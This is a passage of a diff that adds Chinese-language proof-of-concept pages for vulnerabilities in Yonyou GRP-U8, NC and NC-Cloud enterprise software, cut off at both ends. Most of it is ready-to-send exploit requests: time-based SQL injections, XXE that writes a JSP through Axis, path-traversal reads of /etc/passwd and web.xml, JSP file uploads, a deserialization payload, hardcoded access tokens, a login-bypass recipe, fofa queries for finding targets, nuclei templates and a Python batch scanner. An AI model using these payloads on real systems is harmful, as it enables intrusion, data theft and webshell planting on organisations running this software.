+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: JSESSIONID=06D017067FC6F3BFA6150315042277B6
+x-forwarded-for: 127.0.0.1
+Connection: clo
+```
--- a/用友OA/用友GRP-U8-ufgovbank存在XXE漏洞.md
+++ b/用友OA/用友GRP-U8-ufgovbank存在XXE漏洞.md
@@ -0,0 +1,14 @@
+## 用友GRP-U8-ufgovbank存在XXE漏洞
+
+## poc
+```
+POST /ufgovbank HTTP/1.1
+Host: 172.16.135.21:8009
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 1158
+
+reqData=%3C%3Fxml%20version%3D%221.0%22%3F%3E%0A%3C%21DOCTYPE%20foo%20SYSTEM%20%22http%3A%2F%2F127.0.0.1%3A8009%2Fservices%2FAdminService%3Fmethod%3D%21--%253E%253Cdeployment%2520xmlns%253D%2522http%253A%252F%252Fxml.apache.org%252Faxis%252Fwsdd%252F%2522%2520xmlns%253Ajava%253D%2522http%253A%252F%252Fxml.apache.org%252Faxis%252Fwsdd%252Fproviders%252Fjava%2522%253E%253Cservice%2520name%253D%2522OpenTaske%2522%2520provider%253D%2522java%253ARPC%2522%253E%253CrequestFlow%253E%253Chandler%2520type%253D%2522java%253Aorg.apache.axis.handlers.LogHandler%2522%2520%253E%253Cparameter%2520name%253D%2522LogHandler.fileName%2522%2520value%253D%2522C:\UFGOV\U8\webapps\bx_cxjk_list.jsp%2522%2520%252F%253E%253Cparameter%2520name%253D%2522LogHandler.writeToConsole%2522%2520value%253D%2522false%2522%2520%252F%253E%253C%252Fhandler%253E%253C%252FrequestFlow%253E%253Cparameter%2520name%253D%2522className%2522%2520value%253D%2522java.util.Random%2522%2520%252F%253E%253Cparameter%2520name%253D%2522allowedMethods%2522%2520value%253D%2522*%2522%2520%252F%253E%253C%252Fservice%253E%253C%252Fdeployment%22%3E&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
+```
--- a/用友OA/用友GRP-U8-userInfoWeb存在SQL注入.md
+++ b/用友OA/用友GRP-U8-userInfoWeb存在SQL注入.md
@@ -0,0 +1,27 @@
+## 用友GRP-U8-userInfoWeb存在SQL注入
+
+## poc
+```
+POST /services/userInfoWeb HTTP/1.1
+Cache-Control: max-age=0
+Origin: null
+DNT: 1
+Upgrade-Insecure-Requests: 1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+SOAPAction: 
+Content-Type: text/xml;charset=UTF-8
+Host: 172.16.135.132:8009
+Content-Length: 558
+
+<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:3'--</userId>
+      </ser:getUserNameById>
+   </soapenv:Body>
+</soapenv:Envelope>
+```
--- a/用友OA/用友GRP-U8存在XML注入漏洞.md
+++ b/用友OA/用友GRP-U8存在XML注入漏洞.md
@@ -0,0 +1,19 @@
+## 用友GRP-U8存在XML注入漏洞
+
+```
+
+漏洞文件为：WEB-INF/classes/com/ufgov/bank/ufgovBank.class
+
+POST /ufgovbank HTTP/1.1
+
+Host: 127.0.0.1:8089
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 186
+ 
+reqData=<?xml version="1.0"?>
+<!DOCTYPE foo SYSTEM "https://pastebin.com/raw/E2d5s60p">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
+
+```
--- a/用友OA/用友GRP-U8日志泄漏漏洞.md
+++ b/用友OA/用友GRP-U8日志泄漏漏洞.md
@@ -0,0 +1,32 @@
+## 用友GRP-U8日志泄漏漏洞
+
+
+## poc
+```
+GET /logs/debug.log HTTP/1.1
+Host: 172.16.135.132:8009
+Cache-Control: max-age=0
+Origin: null
+DNT: 1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+
+
+GET /logs/info.log HTTP/1.1
+Host: 172.16.135.132:8009
+Cache-Control: max-age=0
+Origin: null
+DNT: 1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+```
--- a/用友OA/用友GRPA++Cloud政府财务云存在任意文件读取漏洞.md
+++ b/用友OA/用友GRPA++Cloud政府财务云存在任意文件读取漏洞.md
@@ -0,0 +1,18 @@
+## 用友GRPA++Cloud政府财务云存在任意文件读取漏洞
+
+## fofa
+```
+body="/pf/portal/login/css/fonts/style.css"
+```
+
+
+## poc
+```
+GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
--- a/word.docx任意文件读取漏洞.md
+++ b/word.docx任意文件读取漏洞.md
@@ -0,0 +1,20 @@
+
+## 用友NC word.docx任意文件读取漏洞
+
+## fofa
+```
+body="UClient.dmg"
+```
+
+## poc
+```
+GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept: */*
+Connection: Keep-Alive
+
+```
+
+## 漏洞复现
+![0152cd5a2d208fb2e336de5ac3621ebb](https://github.com/wy876/POC/assets/139549762/05dcd3bf-a6ae-4aac-95ca-e6788e2eadb0)
--- a/用友OA/用友NC-ActionServlet存在SQL注入漏洞.md
+++ b/用友OA/用友NC-ActionServlet存在SQL注入漏洞.md
@@ -0,0 +1,13 @@
+## 用友NC-ActionServlet存在SQL注入漏洞
+
+
+## poc
+```
+GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.FormulaViewAction&method=execute&repID=1')%20WAITFOR%20DELAY%20'0:0:5'--+&unitID=public HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+SOAPAction: http://tempuri.org/GetHomeInfo
+Accept-Encoding: identity
+Accept: */*
+Connection: keep-alive
+```
--- a/任意文件上传漏洞.md
+++ b/任意文件上传漏洞.md
@@ -0,0 +1,67 @@
+## 用友NC-Cloud uploadChunk 任意文件上传漏洞
+
+## fofa
+```
+app="用友-NC-Cloud"
+```
+
+
+## POC
+
+```
+POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1
+Host: {{Hostname}}
+Content-Type: multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9
+
+--024ff46f71634a1c9bf8ec5820c26fa9--
+Content-Disposition: form-data; name="file"; filename="test.txt"
+
+1123213
+--024ff46f71634a1c9bf8ec5820c26fa9--
+
+```
+
+文件上传路径访问
+/nccloud/test.txt
+
+## nuclei批量yaml文件
+```yaml
+id: yonyou_NCCloud_uploadChunk_upload
+
+info:
+  name: 用友NC Cloud uploadChunk任意文件上传漏洞
+  author: afan
+  severity: critical
+  tags: yonyou,changjietong,bjxsec,yonyouoa
+  description: fofa   app="畅捷通-TPlus"
+variables:
+  file_name: "{{to_lower(rand_text_alpha(8))}}.txt"
+  file_content: "{{to_lower(rand_text_alpha(26))}}"
+requests:
+  - raw:
+      - |
+        POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9
+        accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
+        Content-Length: 153
+
+        --024ff46f71634a1c9bf8ec5820c26fa9
+        Content-Disposition: form-data; name="file"; filename="{{file_name}}"
+
+        {{file_content}}
+        --024ff46f71634a1c9bf8ec5820c26fa9--
+      
+      - |
+        GET /nccloud/{{file_name}} HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers:
+      - type: word
+        words:
+          - "{{file_content}}"
+        part: body
+
+
+```
--- a/用友OA/用友NC-Cloud_importhttpscer接口存在任意文件上传漏洞.md
+++ b/用友OA/用友NC-Cloud_importhttpscer接口存在任意文件上传漏洞.md
@@ -0,0 +1,28 @@
+## 用友NC-Cloud_importhttpscer接口存在任意文件上传漏洞
+
+
+## fofa
+```
+app="用友-NC-Cloud"
+```
+
+## poc
+```
+POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
+Content-Length: 190
+Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
+
+--fd28cb44e829ed1c197ec3bc71748df0
+Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/141172.jsp"
+
+<%out.println(1111*1111);%>
+--fd28cb44e829ed1c197ec3bc71748df0--
+```
+
+上传后的路径 `http://127.0.0.1/141172.jsp`
--- a/用友OA/用友NC-Cloud接口blobRefClassSea存在反序列化漏洞.md
+++ b/用友OA/用友NC-Cloud接口blobRefClassSea存在反序列化漏洞.md
@@ -0,0 +1,26 @@
+## 用友NC-Cloud接口blobRefClassSea存在反序列化漏洞
+
+用友NC Cloud接口 /ncchr/pm/ref/indiIssued/blobRefClassSearch 存在反序列漏洞。
+
+## fofa
+
+```yaml
+app="用友-NC-Cloud"
+```
+
+## poc
+
+```yaml
+POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1
+Content-Type: application/json
+Host: 
+Connection: close
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+
+{"clientParam":"{\"x\":{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"DNSLOG.COM\"}}}"}
+```
+
--- a/用友OA/用友NC-Cloud文件服务器用户登陆绕过漏洞.md
+++ b/用友OA/用友NC-Cloud文件服务器用户登陆绕过漏洞.md
@@ -0,0 +1,19 @@
+# 用友NC-Cloud文件服务器用户登陆绕过漏洞
+
+   用友NC Cloud大型企业数字化平台，深度应用新一代数字智能技术，完全基于云原生架构，打造开放、互联、融合、智能的一体化云平台，聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向，提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案，帮助大型企业全面落地数智化。用友NC-Cloud文件服务器存在一个权限绕过漏洞。
+
+## fofa
+
+```yaml
+app="用友-NC-Cloud"
+```
+
+## poc
+
+访问/fs/出现如下页面，代表漏洞存在
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407171304499.webp)
+
+输入任意用户名+密码登录，将登入时的数据进行抓包拦截其响应包，并将false值，修改成true放行即可成功绕过登录认证。
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407171305886.png)
--- a/用友OA/用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞.md
+++ b/用友OA/用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
+# 用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞
+
+用友NC Cloud queryPsnInfo接口存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+## fofa
+
+```yaml
+app="用友-NC-Cloud"
+```
+
+## poc
+
+```java
+GET /ncchr/pm/obj/queryPsnInfo?staffid=1%27+AND+1754%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%281754%3D1754%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29--+Nzkh HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
+Accesstokenncc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
--- a/用友OA/用友NC-Cloud系统queryStaffByName存在SQL注入漏洞.md
+++ b/用友OA/用友NC-Cloud系统queryStaffByName存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 用友NC-Cloud系统queryStaffByName存在SQL注入漏洞
+
+ NC Cloud是用友推出的大型企业数字化平台。用友NC-Cloud系统queryStaffByName存在SQL注入漏洞。
+
+## fofa
+
+```yaml
+app="用友-NC-Cloud"
+```
+
+## poc
+
+```js
+GET /ncchr/pm/staff/queryStaffByName?name=1%27+AND+7216%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%287216%3D7216%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29--+hzDZ HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
+Accesstokenncc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![image-20240801101631113](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408011016195.png)
--- a/用友OA/用友NC-avatar接口存在文件上传漏洞.md
+++ b/用友OA/用友NC-avatar接口存在文件上传漏洞.md
@@ -0,0 +1,41 @@
+## 用友NC-avatar接口存在文件上传漏洞
+
+## fofa
+```
+body="/Client/Uclient/UClient.exe"
+```
+
+## poc
+```
+POST /uapim/upload/avatar?usercode=1&fileType=jsp HTTP/1.1
+Host: 192.168.63.129:8088
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEXmnamw5gVZG9KAQ
+User-Agent: Mozilla/5.0 
+
+------WebKitFormBoundaryEXmnamw5gVZG9KAQ
+Content-Disposition: form-data; name="file"; filename="111.jsp"
+Content-Type: application/octet-stream
+
+3999
+------WebKitFormBoundaryEXmnamw5gVZG9KAQ--
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/3776732e-df39-4d9e-9f6b-1ffcbd7c2d11)
+
+
+文件上传路径
+
+![image](https://github.com/wy876/POC/assets/139549762/c6a16b38-752c-4a54-88a4-a04b88109145)
+
+```
+GET /uapim/static/pages/photo/1/1.1713358789182.jsp HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
+Connection: close
+Accept-Encoding: gzip, deflate, br
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/b6abe3ba-35e6-410a-a265-9b2e57d7d922)
+
+`http://192.168.63.129:8088/uapim/static/pages/photo/1/1.1713358789182.jsp`
+
--- a/用友OA/用友NC-bill存在SQL注入漏洞.md
+++ b/用友OA/用友NC-bill存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
+## 用友NC-bill存在SQL注入漏洞
+
+用友NC /portal/pt/erfile/down/bill存在SQL注入漏洞，未经身份验证的攻击者可通过该漏洞获取数据库敏感信息。
+
+## fofa
+```
+icon_hash="1085941792" && body="/logo/images/logo.gif"
+```
+
+
+## poc
+```
+GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+
+```
--- a/用友OA/用友NC-complainbilldetail存在SQL注入漏洞.md
+++ b/用友OA/用友NC-complainbilldetail存在SQL注入漏洞.md
@@ -0,0 +1,27 @@
+## 用友NC-complainbilldetail存在SQL注入漏洞
+
+NC系统可利用/ebvp/advorappcoll/complainbilldetail接口中的pk_complaint参数进行sql注入，从而窃取服务器的敏感信息。
+
+
+
+## fofa
+
+```
+app="用友-UFIDA-NC"
+```
+
+
+
+## poc
+
+```
+GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+
+```
+
--- a/用友OA/用友NC-downCourseWare任意文件读取.md
+++ b/用友OA/用友NC-downCourseWare任意文件读取.md
@@ -0,0 +1,108 @@
+## 用友NC-downCourseWare任意文件读取
+
+用友NC `downCourseWare`接口存在任意文件读取漏洞，未授权攻击者可以利用其读取网站配置文件等敏感信息。
+
+## fofa
+
+```
+title=="YONYOU NC"
+```
+
+## poc
+
+```
+GET /portal/pt/downCourseWare/download?fileName=../webapps/nc_web/WEB-INF/web.xml&pageId=login  HTTP/1.1
+Host: ip
+```
+
+![image-20240607191758304](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406071917393.png)
+
+```python
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+# @Author  : 浅梦安全
+import requests
+import argparse
+import time
+from urllib3.exceptions import InsecureRequestWarning
+
+RED = '\033[91m'
+RESET = '\033[0m'
+# 忽略不安全请求的警告
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+def check_vulnerability(url):
+    try:
+        # 构造完整的攻击URL
+        attack_url = url.rstrip('/') + "/portal/pt/downCourseWare/download?fileName=%2e%2e/webapps/nc_web/WEB-INF/web.xml&pageId=login"
+  
+        response = requests.get(attack_url, verify=False, timeout=10)
+  
+        if response.status_code == 200 and 'web-app' in response.text:
+            print(f"{RED}URL [{url}] 可能存在用友NC downCourseWare任意文件读取漏洞{RESET}")
+        else:
+            print(f"URL [{url}] 不存在漏洞")
+    except requests.exceptions.Timeout:
+        print(f"URL [{url}] 请求超时，可能存在漏洞")
+    except requests.RequestException as e:
+        print(f"URL [{url}] 请求失败: {e}")
+
+def main():
+    parser = argparse.ArgumentParser(description='检测目标地址是否存在用友NC downCourseWare任意文件读取漏洞')
+    parser.add_argument('-u', '--url', help='指定目标地址')
+    parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')
+
+    args = parser.parse_args()
+
+    if args.url:
+        if not args.url.startswith("http://") and not args.url.startswith("https://"):
+            args.url = "http://" + args.url
+        check_vulnerability(args.url)
+    elif args.file:
+        with open(args.file, 'r') as file:
+            urls = file.read().splitlines()
+            for url in urls:
+                if not url.startswith("http://") and not url.startswith("https://"):
+                    url = "http://" + url
+                check_vulnerability(url)
+
+if __name__ == '__main__':
+    main()
+```
+
+
+
+### **Yaml**
+
+```
+id: yonyou-nc-downCourseWare-fileread
+
+info:
+  name: 用友NC downCourseWare任意文件读取
+  author: onewin
+  severity: high
+  description: 用友NC downCourseWare任意文件读取
+  metadata:
+    fofa-query: title=="YONYOU NC"
+  tags: yonyou,fileread
+
+http:
+- raw:
+  - |+
+    @timeout: 30s
+    GET /portal/pt/downCourseWare/download?fileName=../webapps/nc_web/WEB-INF/web.xml&pageId=login  HTTP/1.1
+    Host: {{Hostname}}
+
+
+  max-redirects: 3
+  matchers-condition: and
+  matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "web-app"
+        part: body
+```
+
--- a/用友OA/用友NC-downTax存在SQL注入漏洞.md
+++ b/用友OA/用友NC-downTax存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+## 用友NC-downTax存在SQL注入漏洞
+
+NC65系统可利用/portal/pt/downTax/download接口中的classid参数进行sql注入，从而窃取服务器的敏感信息。
+
+## fofa
+
+```
+app="用友-UFIDA-NC"
+```
+
+## poc
+
+```
+GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+```
+
--- a/用友OA/用友NC-oacoSchedulerEvents接口存在sql注入漏洞.md
+++ b/用友OA/用友NC-oacoSchedulerEvents接口存在sql注入漏洞.md
@@ -0,0 +1,23 @@
+## 用友NC-oacoSchedulerEvents接口存在sql注入漏洞
+
+用友NC存在SQL注入漏洞，该漏洞源于/portal/pt/oacoSchedulerEvents/isAgentLimit接口中的pk_flowagent参数存在sql注入漏洞，攻击者可通过该漏洞获取数据库敏感数据。
+
+## fofa
+
+```
+app="用友-UFIDA-NC"
+```
+
+## poc
+
+```
+GET /portal/pt/oacoSchedulerEvents/isAgentLimit?pageId=login&pk_flowagent=1'waitfor+delay+'0:0:5'-- HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
--- a/用友OA/用友NC-pagesServlet存在SQL注入.md
+++ b/用友OA/用友NC-pagesServlet存在SQL注入.md
@@ -0,0 +1,24 @@
+## 用友NC-pagesServlet存在SQL注入
+
+用友NC是由用友公司开发的一套面向大型企业和集团型企业的管理软件产品系列。这一系列产品基于全球最新的互联网技术、云计算技术和移动应用技术，旨在帮助企业创新管理模式、引领商业变革。用友NC /portal/pt/servlet/pagesServlet/doPost接口存在SQL注入漏洞，攻击者通过利用SQL注入漏洞获取数据库敏感信息。
+
+## fofa
+
+```
+app="用友-UFIDA-NC"
+```
+
+## poc
+
+```
+GET /portal/pt/servlet/pagesServlet/doPost?pageId=login&pk_group=1'waitfor+delay+'0:0:5'-- HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![image-20240604122921130](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406041229285.png)
--- a/用友OA/用友NC-runStateServlet接口存在SQL注入漏洞.md
+++ b/用友OA/用友NC-runStateServlet接口存在SQL注入漏洞.md
@@ -0,0 +1,30 @@
+## 用友NC-runStateServlet接口存在SQL注入漏洞
+
+
+## fofa
+```
+icon_hash="1085941792"
+```
+
+
+## poc
+```
+GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proInsPk=1'waitfor+delay+'0:0:6'-- HTTP/1.1
+Host: 192.168.63.129:8088
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 19
+
+```
+
+
+## poc2
+```
+GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:6'-- HTTP/1.1
+Host: 192.168.63.129:8088
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 19
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/fe20943d-db7b-4a6e-85c1-b259e410f0ac)
--- a/用友OA/用友NC-saveDoc.ajax存在任意文件上传漏洞.md
+++ b/用友OA/用友NC-saveDoc.ajax存在任意文件上传漏洞.md
@@ -0,0 +1,22 @@
+## 用友NC-saveDoc.ajax存在任意文件上传漏洞
+
+
+## poc
+```
+POST /uapws/saveDoc.ajax?ws=/../../test2.jspx%00 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
+Content-Type: application/x-www-form-urlencoded
+
+content=<hi xmlns:hi="http://java.sun.com/JSP/Page">
+      <hi:directive.page import="java.util.*,java.io.*,java.net.*"/>
+   <hi:scriptlet>
+            out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete(); 
+   </hi:scriptlet>
+</hi>
+```
+
+文件路径
+```
+http://ip/uapws/test2.jspx
+```
--- a/用友OA/用友NC-showcontent接口存在sql注入漏洞.md
+++ b/用友OA/用友NC-showcontent接口存在sql注入漏洞.md
@@ -0,0 +1,22 @@
+## 用友NC-showcontent接口存在sql注入漏洞
+
+
+## poc
+```
+orale:
+GET /ebvp/infopub/showcontent?id=1'%20AND%203983=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(76)||CHR(108)||CHR(101),9)%20AND%20'Mgtn'='Mgtn HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Accept-Encoding: identity
+Connection: close
+Content-Type: text/xml; charset=utf-8
+SL-CE-SUID: 31
+
+
+
+mssql:
